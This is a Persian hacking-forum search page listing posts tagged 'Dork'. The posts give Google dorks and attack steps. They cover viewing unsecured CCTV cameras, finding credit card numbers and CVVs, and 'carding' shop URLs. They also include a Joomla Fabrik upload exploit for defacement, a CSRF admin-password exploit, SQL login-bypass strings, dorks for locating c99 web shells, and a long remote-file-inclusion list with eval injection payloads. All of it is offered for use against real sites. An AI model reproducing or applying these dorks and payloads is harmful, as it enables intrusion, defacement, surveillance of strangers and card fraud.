رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'Dork'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.

  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

وبلاگ‌ها

چیزی برای نمایش وجود ندارد

جستجو در...

نمایش نتایجی که شامل...


تاریخ ایجاد

  • شروع

    پایان

آخرین بروزرسانی

  • شروع

    پایان

فیلتر بر اساس تعداد...

تاریخ عضویت

  • شروع

    پایان

گروه

About Me

11 نتیجه پیدا شد

  1. MR.MSA

    ۵ نکته جالب در دیفیس

    MR.MSA پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی

    با سلام خدمت دوستان عزیز توی این ویدئو ۵ نکته جالب در رابطه با دیفیس رو گفتیم و به دوستانی که به دیفیس علاقه دارن خیلی پیشنهاد میکنم 😁 لینک در یوتیوب لینک در آپارات
  2. MR.MSA

    دورک دوربین های مداربسته

    MR.MSA پاسخی ارسال کرد برای یک موضوع در بحث آزاد

    در این تاپیک دورک دوربین های مداربسه رو قرار دادم براتون و یه سری دوربین مداربسته که می توانید راحت تماشا کنید . inurl:"view.shtml" "Network Camera" "Camera Live Image" inurl:"guestimage.html" inurl:/ViewerFrame? intitle:"Network Camera NetworkCamera" intitle:NetworkCamera intext:"Pan / Tilt" inurl:ViewerFrame inurl:/live.htm intext:"M-JPEG"|"System Log"|"Camera-1"|"View Control" inurl:"MultiCameraFrame?Mode=Motion" intitle:"IP CAMERA Viewer" intext:"setting | Client setting" allintitle: Axis 2.10 OR 2.12 OR 2.30 OR 2.31 OR 2.32 OR 2.33 OR 2.34 OR 2.40 OR 2.42 OR 2.43 "Network Camera " Display Cameras intitle:"Express6 Live Image" intitle:"Orite IC301" camera linksys inurl:main.cgi دورک های زیادی در سایت های مختلف هست ولی این ها رو دونه دونه چک کردم تا بتوانید راحت تر استفاده کنید . این دوربین های مداربسته رو از همون دورک ها بدست اوردم و همین الان لینک ها چک شده . [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] "منبع : exploit-db.com " امیدوارم لذت برده باشید ، دونه دونه لینک چک کردن سخت هست تشکر فراموش نشه لطفا . 😄 موفق و پیروز باشید .
  3. MR.MSA

    متد Fabrik

    MR.MSA پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی

    Fabrik موارد قابل استفاده : در سایت های جوملا قابل استفاده است . یکی از زیر مجموعه های RFI در سایت هایی که این ادرس را دارند (دورک): index.php?option=com_fabrik ....و Dork : inurl:index.php?option=com_fabrik مراحل متد :‌ ۱ ) دورک را بزنید و یک سایت را انتخاب کنید و اگر صفحه بدون خطای ۴۰۴ ، ۴۰۱ و ۵۰۰ لود شد یعنی به احتمال زیاد این باگ را دارد . (مطمئن شوید که سایت با cms جوملا هست ) ۲) این اکسپلویت را به ادرس سایت اضافه کنید . Exploit : index.php?option=com_fabrik&c=import&filetype=csv&tables=1 ۳) سپس فایل خود را آپلود کنید .( اون فایل می توانید دیفیس پیج شما باشد . ) ۴) این ادرس را به سایت اضافه و به جای (FILE_NAME) نام فایل خودتان را بنویسید . /media/(FILE_NAME)
  4. MR.MSA

    اکسپلویت باگ CSRF

    MR.MSA پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی

    با سلام خدمت دوستان عزیز گارد ایران من MR.MSA در این تاپیک قصد دارم یک اکسپلویت در باگ CSRF رو به شما معرفی کنم و کمی توضیح درباره این باگ برای مبتدی ها ، با من همراه باشید . -------------------- CSRF : Cross Site Request Forgery نکات باگ : معنی شده آن جعل درخواست است . این باگ را کرم تحت وب می شناسند و اثر بدی دارد . این باگ توسط سایت و فایروال شناسایی نمی شود . -------------------- نحوه حمله : این حمله به طوری است که ما با استفاده از جعل کوکی admin سایت می توانیم درخواست های جعلی بدهیم . -------------------- انجام حمله : قدم اول : گوگل دورک Google Dork : inurl:admin/admin.php Travel PORTAL ---------- قدم دوم : اکسپلویت به این ادرس بروید و اکسپلویت رو با پسوند html ذخیره کنید . exploit : [Hidden Content] ---------- قدم سوم : به جای [Hidden Content] آدرس سایت خود را بزنید => [Hidden Content] قدم چهارم : رمز جدید خود را بزنید . ----------------------------- امید وارم از این تاپیک لذت برده باشید و اکسپلویت مورد تایید شما قرار گرفته باشه . اگه مشکلی داشت به خوبی خودتون ببخشید سعی کردم تاپیک رو جوری بنویسم که همه بتوانند استفاده کنند . ******************** MR.MSA ***************** <------------------------MR.MSA----------------------> -------- پیج فیک ------- <صفحه لاگین اینستاگرام (فیک)> ------- باگ -------- <آموزش متد polygon در sql injection > <آموزش متد join در sql injection > <نکته مهم در متد join > ------- افزونه -------- <افزونه Wapplyzer (اسکنر سایت ) > <افزونه اسکن سایت های wordpress> <افزونه whatruns (جمع آوری اطلاعات سایت)> <------------------------MR.MSA----------------------/>
  5. mownten
    سلام مجدد خدمت اعضای محترم در اینجا هم ابزار Dork Combine v1.2 رو در اختیارتون میذارم که از ابزارهای مفید برای ساخت دورک هست. کار باهاش راحته. نرم افزار رو اجرا میکنید. Load Url رو میزنید و فایل متنی page perameters رو لود میکنید. بعد روی دکمه ی Paste Urls کلیک کنید تا وارد بخش پارامترها بشن. تیک Inurl رو بزنید و روی Gen Dorks کلیک کنید. می بینید که دورک ها ساخته میشن و با استفاده از دکمه ی Save میتونید بعنوان فهرست دورک ذخیره ش بکنید. اگر هم میخواید دامنه ای رو بهش اضافه بکنید تیک Site رو بزنید و توی کارد روبروش هر دامنه ای خواستید بنویسید. مثلا us. یا co.uk. یا il. یا هر چیز دیگه. ضمناً این ابزار مورد استفاده شخص خود من هست اما توسط virustotal با چهار ضریب خطر شناسایی شده. مسئولیت استفاده از این ابزار بر عهده کاربر هست. لینک اسکن: Virustotal - Dork Combine v1.2 رمز عبور : guardiran.org نکته: حجم کلی 25 مگ هست که به پنج پارت پنج مگابایتی تبدیلش کردم. Dork Combine v1.2 by Volevanya [Guardiran.org].zip Dork Combine v1.2 by Volevanya [Guardiran.org].z01 Dork Combine v1.2 by Volevanya [Guardiran.org].z02 Dork Combine v1.2 by Volevanya [Guardiran.org].z03 Dork Combine v1.2 by Volevanya [Guardiran.org].z04
  6. mownten
    با سلام خدمت دوستان عزیز و گرامی امروز قصد دارم آموزش جامعی در خصوص چگونگی استفاده از گوگل دورک ارائه بدم و تشریح کنم که دورک چی هست و شامل چه اپراتورهایی میشه. گاهی همین دورک ها خیلی بهتر شما رو به تارگت ها و اهدافی که دارید نزدیک می کنند. بریم سراغ اصل مصلب: 1- تاریخچه: مفهوم گوگل هکینگ در اصل مربوط به سال 2002 هست که اقایی به نام جانی لانگ تونست با استفاده از ایجاد یک دیتابیس از نتایج جستجوی گوگل، تارگت های بسیار خوشمزه ای با اسیب پذیری های مختلف رو پیدا بکنه و از اونجا بود که گوگل هکینگ تبدیل به یکی از مباحث هک شد. خودش شرکت گوگل میگه: اگر هنوز نمیدونید چطور باید از گوگل استفاده کنید، باید یه دوره ضروری برید که چطور از اینترنت استفاده کنید. بعنوان یک روش هک کارا، جستجو با دورک توی گوگل میتونه شما رو به حساب های کاربری و رمزعبورها، لیست ایمیل ها، اسناد محرمانه و مهم، اطلاعات مالی اشخاص و وبسایت های آسیب پذیر برسونه. این حجم از اطلاعات میتونن برای کثیری از فعالیت های غیرمجاز و غیرقانونی مانند تروریسم سایبری، جاسوسی صنعتی، شناسایی اسناد به سرقت رفته، دزدی و سرقت سایبری مورد استفاده قرار بگیرن. 2- اپراتورها مثل برنامه نویسی، دورک گوگل هم اپراتورهای خودش رو داره و اشاره به همه ی این اپراتورها از حوصله ی این مقاله خارج هست ولی رایج ترین اپراتورهای استفاده شده رو تشریح میکنم. این اپراتورها یه سری اپراتورهای ویژه در جستجوی گوگل هستند که نتیجه جستجو رو قوی می کنند و آیتم ها و تارگت های مفیدی رو به شما ارائه میدن: intitle استفاده از Intitle به گوگل میگه که فقط وبسایت هایی رو نشون بده که متن مورد نظر توی عنوان وبسایتشون وجود داشته باشه. بعنوان مثال : intitle:"login page" allintitle این هم مثل intitle کار میکنه اما به دنبال همه ی کلمات مورد نظر میگرده. inurl به دنبال واژه های خاص توی لینک ها میگرده. مثل: inurl:"login.php" allinurl این هم مثل Inurl هست ولی به دنبال همه ی واژه ها توی لینک میگرده نه فقط یه بخش خاصی از واژه ها filetype به دنبال فرمت های خاصی از فایل ها میگرده. (به شوخی بهش میگن دورک تحصیلی). مثلا filetype:pdf دنبال فایل های pdf توی وبسایت ها میگرده. ext این هم مثل filetype هست و دنبال فایل میگرده. مثلاً ext:pdf دنبال فایل های pdf می گرده. intext به دنبال واژه ها توی محتوای وبسایت میگرده. مثلا صفحاتی که فایل ها رو به صورت مستقیم برای شما لیست میکنن بالاشون نوشته index of و برای دانلود راحت این فایل ها میتونید سرچ کنید: intext:"index of /" allintex این هم مثل intext هست ولی همه ی کلماتی که بهش معرفی میکنید روو سرچ میکنه نه فقط یکی دو کلمه رو site نتایج جستجو رو محدود به یه سایت میکنه. مثلا میخواد بدونید چیزی درباره روباتیک توی وبسایت گاردایران هست یا نه. سرچ میکنید: site:'guardiran.org" روباتیک 3- فرمول دورک های گوگل: دورک ها همونطور که گفتم برای نتیجه جستجو شرایط تعیین میکنن و مثل فیلتر عمل میکنن و گوگل هم نتایج رو طبق خواسته شما نشون میده. این فرایند ممکنه براتون کمی زمان بر باشه ولی خروجی جستجو ارزش خوندن این مقاله رو داره. فرمول پایه دورک این هست: inurl:."domain"/"dorks" "" خب به وضوح هم میبینید که قراره اینجوری ازش استفاده کنیم: inurl برای جستجوی واژه ها توی لینک وبسایت ها هست domain برای جستجوی دامنه مورد نظر شما توی لینک ها هست dorks هم که بخش مورد نظر شما هست. حالا فرض کنیم که به دنبال پیدا کردن صفحات ورود مثل login.php توی وبسایت های دولتی عربستان سعودی هستیم. بعد از مشاهده فهرست دامنه های بین الملل میفهمیم که دامنه وبسایت های دولتی عربستانی gov.sa هست. پس سرچ میکنیم: inurl:.gov.sa/login.php حالا اگر با این دورک گوگل فقط در حد یکی دو صفحه نهایتا چهار صفحه نتایج رو نشون شما داد میتونید از دورک های زیر بجای دورک Inurl استفاده کنید و نتایج متفاوتی رو ببینید: intitle: inurl: intext: define: site: maps: book: info: movie: weather: related: link: (بعضی از دورک های بالا در ایران چندان مورد استفاده قرار نمیگیره) همه این دورک ها امکان پیدا کردن آسیب پذیری ها رو برای شما میسر میکنن و با وجود کمی خلاقیت می بینید که به نتایج خوشمزه ای میرسید. خب الان میخوام توضیح بدم که چطور بتونید با استفاده از دورک اسیب پذیری ها رو توی وبسایت ها پیدا کنید. INTITLE : شما با استفاده از intitle میتونید هر چیزی رو توی وبسایت ها پیدا کنید که میتونه به شما توی دانلود فایل های مدنظرتون هم کمک کنه. مثلا دلتون کشیده آهنگ دانلود کنید و حوصله وبسایت های پر از تبلیغ رو ندارید. سرچ میکنید: intitle: index of mp3 و بعد میرسید به یه هاست پر از آهنگ مثل اینجا INURL : از اونجا که برای استفاده از باگ sql injection نیاز به یه تابع برای بررسی مشکل دار بودن دیتابیس داریم میدونیم که آخر لینک ما باید یه عددی باشه که بعد از مساوی (=) قرار گرفته باشه. حالا میخواد این عدد مربوط به هر چیزی باشه. مثلا category.php?id=41 ینی دسته بندی شماره 41 یا هم news.php?id=3324 یا خبر شماره 3324 . فرقی نمیکنه. دورک های خیلی زیادی برای باگ محبوب و مشهور sql injection وجود دارن که من دورک ایندکس رو مثال میزنم: inurl:index.php?id= INTEXT : خب ما میدونیم که هر کسی که یک نوع سیستم مدیریت محتوا یا قالب یا افزونه رو طراحی میکنه از امضای خودش برای معرفی محصول استفاده میکنه. فرض میکنیم که ما یه آسیب پذیری توی وردپرس پیدا کردیم و میخوایم وبسایت های وردپرسی رو پیدا کنیم. یکی از راه ها استفاده از intext و جستجوی اون متن هست. مثلا: intext:"Powered by AutoIndex PHP Script" گوگل هم با این درخواست شما وبسایت هایی رو نشون میده که توسط AutoIndex PHP Script راه اندازی شدن. برای جستجوی صفحات ورودی و تست آسیب پذیری ورود به بخش ادمین وبسایت ها میتونید کلمه /adminpanel/ رو با استفاده از دورک سرچ کنید و وقتی به صفحات ورود رسیدید برای نام کاربری و رمزعبور از '=' 'OR' استفاده کنید Username : '=' 'OR' Password : '=' 'OR' DEFINE : شما وقتی که به یه مشکلی برمیخورید و یا خطایی که باهاش مواجه شدید رو نمیشناسید میتونید از این دورک استفاده کنید. مثلا با خطای sql syntax error مواجه میشید و نمیدونید این خطا اصلا ینی چه؟ با این سرچ میتونید به نتیجه برسید: define:"sql syntax error" MAPS : درخواست شما رو بر اساس نقشه جستجو میکنه و نتیجه رو میگه. RELATED : با استفاده از این دورک میتونید به نتایج مرتبط با مورد مدنظر خودتون دسترسی پیدا کنید. مثلا دنبال مطالبی در خصوص کره شمالی میگردید. related: north korea LINK : این دورک هم به قدرت دورک inurl میتونه نتایج مرتبط با جستجو در لینک ها رو نشون بده. بعضی جاها هم بهتر جواب میده. link:index.php?id= 4-نتیجه گیری دورک های گوگل بسیار مهم هستند و پیشنهاد میکنم که قبل از هرگونه بررسی، شناسایی و یا حمله علیه تارگت های مدنظر، از گوگل استفاده کنید و در برخی موارد خواهید دید که بجای گذراندن چند ساعت وقت پای کالی لینوکس برای بدست آوردن رمز عبور، با استفاده از دورک گوگل میتوانید اطلاعات حساس موجود در فایلهایی با فرمت های مختلف .txt یا .xlsx و غیره را بدست آورید. در پایان هم برای مشاهده دورک های بسیار فراوان دو وبسایت بسیار مفید رو معرفی میکنم: لینک بخش گوگل دورک در وبسایت exploit-db : [Hidden Content] لینک وبسایت مربوط به گوگل دورکینگ: [Hidden Content] موفق و موید باشید.
  7. mownten

    گوگل دورک یافتن شل c99

    mownten پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی

    اینم از لقمه آماده اگر کسی رفته باشه جایی شل c99 آپلود پیدا کرده باشه چطور ما هم اون شل رو پیدا کنیم؟ به دلیل طولانی بودن لیست، توی یه فایل متنی گذاشتمشون. رمز عبور : guardiran.org Shell c99 google dorks - guardiran.org.rar
  8. Mr_007
    Dork Carding – دورک های جدید برای هک کارت های اعتباری ( Master Card – Visa Card – …. ) checkout.asp?UserID= checkout.asp?cartid= checkout.cfm?UserID= checkout.cfm?cartid= checkout.php?UserID= checkout.php?cartid= checkout1.asp?cartid= checkout1.cfm?cartid= checkout1.php?cartid= checkout_confirmed.asp?order_id= checkout_confirmed.cfm?order_id= checkout_confirmed.php?order_id= db/CART/product_details.asp?product_id= db/CART/product_details.php?product_id= eshop.php?id= estore/products.php?cat= garden_equipment/Fruit-Cage/product.asp?pr= garden_equipment/Fruit-Cage/product.php?pr= garden_equipment/pest-weed-control/product.asp?pr= garden_equipment/pest-weed-control/product.php?pr= getbook.asp?bookid= getbook.cfm?bookid= getbook.php?bookid= giftDetail.asp?id= giftDetail.cfm?id= giftDetail.php?id= giftshop/product.php?proid= global/product/product.asp?gubun= global/product/product.php?gubun= goods_detail.asp?data= goods_detail.php?data= goods_detail.php?goodsIdx= inurlrod_detail.php?id= inurlrod_detail.php?id= inurlrod_info.php?id= inurlrod_info.php?id= inurlroduct-item.php?id= inurlroduct-item.php?id= inurlroduct.php?id= inurlroduct.php?id= inurlroduct_ranges_view.php?ID= inurlroduct_ranges_view.php?id= inurlroductdetail.php?id= inurlroductdetail.php?id= inurlroductinfo.php?id= inurlroductinfo.php?id= inurlroduit.php?id= inurlroduit.php?id= inurl:shop.php?do=part&id= inurl:shop.php?do=part&id= inurl:shop_category.php?id= inurl:shopping.php?id= inurl:shopping.php?id= inurl:view_product.php?id= inurl:view_product.php?id= irbeautina/product_detail.asp?product_id= irbeautina/product_detail.php?product_id= item.asp?eid= item.asp?id= item.asp?iid= item.asp?item_id= item.asp?itemid= item.asp?model= item.asp?prodtype= item.asp?shopcd= item.asp?sub_id= item.cfm?eid= item.cfm?item_id= item.cfm?itemid= item.cfm?model= item.cfm?prodtype= item.cfm?shopcd= item.php?SKU= item.php?cat= item.php?code= item.php?eid= item.php?id= item.php?iid= item.php?item= item.php?item_id= item.php?itemid= item.php?model= item.php?prodtype= item.php?shopcd= item.php?sub_id= item/detail.php?num= item/wpa-storefront-the-ultimate-wpecommerce-theme/discussion/61891?page= itemDesc.asp?CartId= itemDesc.cfm?CartId= itemDesc.php?CartId= item_book.asp?CAT= item_book.php?CAT= item_details.asp?catid= inurl:".php?cat=" intext:"shopping" inurl:".php?cat=" intext:"add to cart" inurl:".php?cat=" intext:"Buy Now" inurl:".php?cat=" intext:"View cart" inurl:".php?cat=" intext:"boutique" inurl:".php?cat=" intext:"/store/" inurl:".php?cat=" intext:"/shop/" inurl:".php?cat=" intext:"Toys" inurl:".php?catid=" inurl:".php?catid=" intext:"View cart" inurl:".php?catid=" intext:"Buy Now" inurl:".php?catid=" intext:"add to cart" inurl:".php?catid=" intext:"shopping" inurl:".php?catid=" intext:"boutique" inurl:".php?catid=" intext:"/store/" inurl:".php?catid=" intext:"/shop/" inurl:".php?catid=" intext:"Toys" inurl:".php?categoryid="
  9. kali

    هک کارت اعتباری ار طریق گوگل

    kali پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی

    سلام در این آموزش با استفاده از دورک زیردر گوگل سرچ کنند میتوانید کارت اعتباری یوزر پسورد دریافت کنید intext:exp: | expired: credit card number: cvv: ext:txt 2018 intext:exp: | expired: credit card number: cvv: ext:txt 2017 intext:exp: | expired: credit card number: cvv: ext:txt 2016 intext:exp: | expired: credit card number: cvv: ext:txt 2015 intext:exp: | expired: credit card number: cvv: ext:txt 2014 اگه یوزر عادی چیزی نفهمیدن بگین یک فیلم آموزشی بسازم
  10. C0d3!Nj3ct!0n

    دورک های باگ RFI

    C0d3!Nj3ct!0n پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی

    RFI DORK .scan /components/com_joomlalib/standalone/stubjambo.php?baseDir= “/index.php?option=com_easybook” .scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=50? .scan /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval ($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= “Diese Seite wurde mit der quelloffenen Software CMS Made Simple erstellt.” .scan /members/?INC= “YourWebsitename gives you the best search results and keyword bidding.” .scan /members/?INC= “If You lost password enter Your login:” .scan2 ////////?cmd&file= “index.php?cmd=10? .scan2 /include/admin.lib.inc.php?site_path= /list.php?bbs_id= .scan2 /components/com_joomlalib/standalone/stubjambo.php?baseDir= “option,com_joomlalib” .scan2 /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath= “/plugins/mygallery/” .scan2 /skins/advanced/advanced1.php?pluginpath[0]= “/advanced2.php” .scan2 /admin/auth.php?xcart_dir= “/pages.php?pageid=3? -p 200 .scan2 /admin/auth.php?xcart_dir= “/admin/auth.php?xcart_dir=” .scan2 /?sourcedir= “/QueryString.php” .scan2 /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path= “/board.php?board=” .scan2 ?sourcedir= index.php?sourcedir= .scan2 /components/com_joomlalib/standalone/stubjambo.php?baseDir= /index.php?option=com_gallery2 .scan2 /bemarket/postscript/postscript.php?p_mode= /bemarket/ .scan2 /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval ($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= /index.php?mact= -p 200 .scan2 /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval ($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= News,cntnt01,detail,0&cntnt01articleid= -p100 .scan2 /stats.php?dir[func]=&dir[base]= “mygamingladder” “my gaming ladder” .scan2 /extras/poll/poll.php?file_newsportal= “/post.php?newsgroups=” .scan2 /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= “com_sitemap” .scan2 /autoclose.php?subd= “Help Desk Software By Kayako eSupport v3.10.02? .scan2 /kboard.php?board=notice&act=write&no=3&page=&cid=& mode=reply&act= “/board.php?board=” .scan2 /kboard.php?board=notice&act=write&no=3&page=&cid=& mode=reply&act= “/kboard.php?board=notice” .scan2 /inc/shows.inc.php?cutepath= “Translated by Slaver” .scan2 /themes/default/index.php?main= “cfagcms” “cfagcms” .scan2 /themes/default/index.php?main= “cfag cms” .scan2 /comments.php?id={${include($ddd)}}{${exit()}}&ddd= “poll_ssi.php” .scan2 /poll/comments.php?id={${include($ddd)}}{${exit()}}&ddd= “/poll_cookie.php” .scan2 /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “/index.php?option=com_content” xoo .scan2 /admin.php?include_path= “Powered by Lazarus Guestbook from carbonize.co.uk” .scan2 /classes/Import_MM.class.php?g_rb_basedir= “PHPRecipeBook” .scan2 /?sIncPath= “Copyright © 2008 Your Company.” .scan2 /?sIncPath= “/index.php?members_mode=” .scan2 /?sIncPath= “/index.php?members_mode=top” .scan2 /?sIncPath= “index.php?tags_mode=profile” .scan2 /common/db.php?commonpath= “playing.php” .scan2 /update/update2.php?lang= photokorn 1.53 .scan2 /index.php?view=page&pagename= “/?view=main&cityid=” .scan2 /index.php?view=page&pagename= “You have an error in your SQL syntax;” .scan2 /index.php?view=page&pagename= “/?view=selectcity&targetview=post&cityid=-3〈=en” .scan2 /index.php?load= “/index.php?load=home” .scan2 /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= “/index.php?module=Pagesetter” .scan2 /index.php?view=page&pagename= “/?view=main&cityid=” .scan2 /index.php?view=page&pagename= “You have an error in your SQL syntax;” .scan2 /index.php?view=page&pagename= “/?view=selectcity&targetview=post&cityid=-3〈=en” .scan2 /page.php?id= “RCMS-Pro” .scan2 /page.php?id= “©2005 – 2006 Roosevelt Purification. RGameScript is a free software under GNU/GPL License” .scan2 /page.php?id= “/index.php?id=cats” .scan2 /function.inc.php?path= “ACGVclick” “ACGVclick” .scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx” “MODx” .scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx Parse Error” .scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=5? .scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=1&start=10? .scan2 /tools/send_reminders.php?noSet=0&includedir= “WebCalendar v1.1.0c-CVS” .scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “snippets/reflect” .scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx CMS” .scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “My MODx Site is powered by MODx Content Management System” .scan2 /index.php?view=page&pagename= “Buy, sell, trade, date, events… post anything” .scan2 /index.php?view=page&pagename= “Thank you for stopping by my site. Here you can leave your mark.” .scan2 /includes/function_core.php?web_root= “Mp3 Rating” .scan2 /?mosConfig_absolute_path= “Powered by Joomla!” .scan2 /modules/Forums/admin/admin_words.php?phpbb_root_path= “Hebrew Ver. HebNukeR 2.0 © 2004 by HebNukeR.org. All Rights Reserved” .scan2 /index.php?option=com_custompages&cpage= Joomla custompages .scan2 /booth.php?include_path= “/poll_cookie.php” .scan2 /update/update2.php?lang= “photo foto gallery bilder tauchen wracks galerie” .scan2 /header.php?base_folder= “Powered by Bab.stats” .scan2 /tools/send_reminders.php?noSet=0&includedir= WebCalendar v1.0RC3 (11 Mar 2005) .scan2 /booth.php?include_path= “/poll_cookie.php” .scan2 /index.php?cmd&file= “Membre avec photos seulement ?” .scan2 /index.php?cmd&file= “%22HOME%22+%22%7C%22+%22UPLOAD+YOUR+PHOTO%22+%22% 7C%22+%22LATEST+USERS%22+%22%7C%22+%22TOP+10%22+%2 2%7C%22+%22TOP+GUYS%22+%22%7C%22+%22TOP+GIRLS%22+% 22%7C%22+%22CONTACT%22? .scan2 /index.php?cmd&file= “List Users with Pics only?” .scan2 /index.php?cmd&file= “So you think you’re HOT?” .scan2 /contenido/external/frontend/news.php?cfg[path][includes]= Contenido Login .scan2 /contenido/external/frontend/news.php?cfg[path][includes]= “Contenido Login” “Contenido Login” .scan2 /clmcpreload.php?CLPATH= “CaLogic” “Calendars” .scan2 /txt-db-api/txt-db-api.php?API_HOME_DIR= “linkmix” “linkmix” “linkmix” .scan2 /cms/system/openengine.php?oe_classpath= “/cms/website.php?id=/de/” .scan2 /modules/Forums/admin/admin_words.php?phpbb_root_path= “Thai Edition by ThaiNuke” .scan2 index.php?custompluginfile[]= “Sorry, your account does not have access to submit information” .scan2 include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= /index.php?nwaction=shownews .scan2 include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= /article.php?article_file= .scan2 include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= “Newswriter” “Newswriter” .scan2 /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= “coppermine” “coppermine” “coppermine” .scan2 /config.inc.php?path_escape= “Your Personal Search Advisor !” .scan2 /include/scripts/export_batch.inc.php?DIR= “ModernBill” .scan2 /config/config_admin.php?INC= “YourWebsitename gives you the best search results and keyword bidding.” .scan2 /config/config_admin.php?INC= %22home%22+%22%7C%22+%22login%22+%22%7C%22+%22add+ your+site%22+%22%7C%22+%22affiliate+program%22+%22 %7C%22+%22privacy%22+%22%7C%22+%22terms%22 .scan2 /include/admin.lib.inc.php?site_path= /view.php?bbs_id= .scan2 /clmcpreload.php?CLPATH= “© Philip Boone” .scan components/com_virtuemart/install.php?mosConfig_absolute_path= “powered by VirtueMart” .scan includes/archive/archive_topic.php?phpbb_root_path= IntegraMOD .scan components/com_moofaq/includes/file_includer.php?gzip=0&file= “com_moofaq” .scan /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path= /com_fabrik/ .scan /index.php?option=com_fabrik&task=view&Itemid=&mosC onfig_absolute_path= /com_fabrik/
  11. *diamond*

    چند نكته مهم در نوشتن دورك

    *diamond* پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی

    inurl:your text ======== این برای زمانی به کار میره که شما میخواهید یک کلمه در دامین باشد intitle:your text ======== این برای زمانی به کار میرود که شما میخواهید نام سایت کلمه مورد نظرتان باشد intext:your text ======== این برای زمانی به کار میرود که شما میخواهید کلمه ی مورد نظرتون توی کل سایت باشه site:.com <or> .org <or> .net <or> more======== برای زمانی به کار میرود که شما میخواهید دامنه دات کام باشد یا دات نِت باشد یا ... filetype: php <or> asp <or> more========برای زمانی به کار میرود که شما میخواهید سایت مورد نظرتون php یا asp یا ... باشد
×
×
  • ایجاد مورد جدید...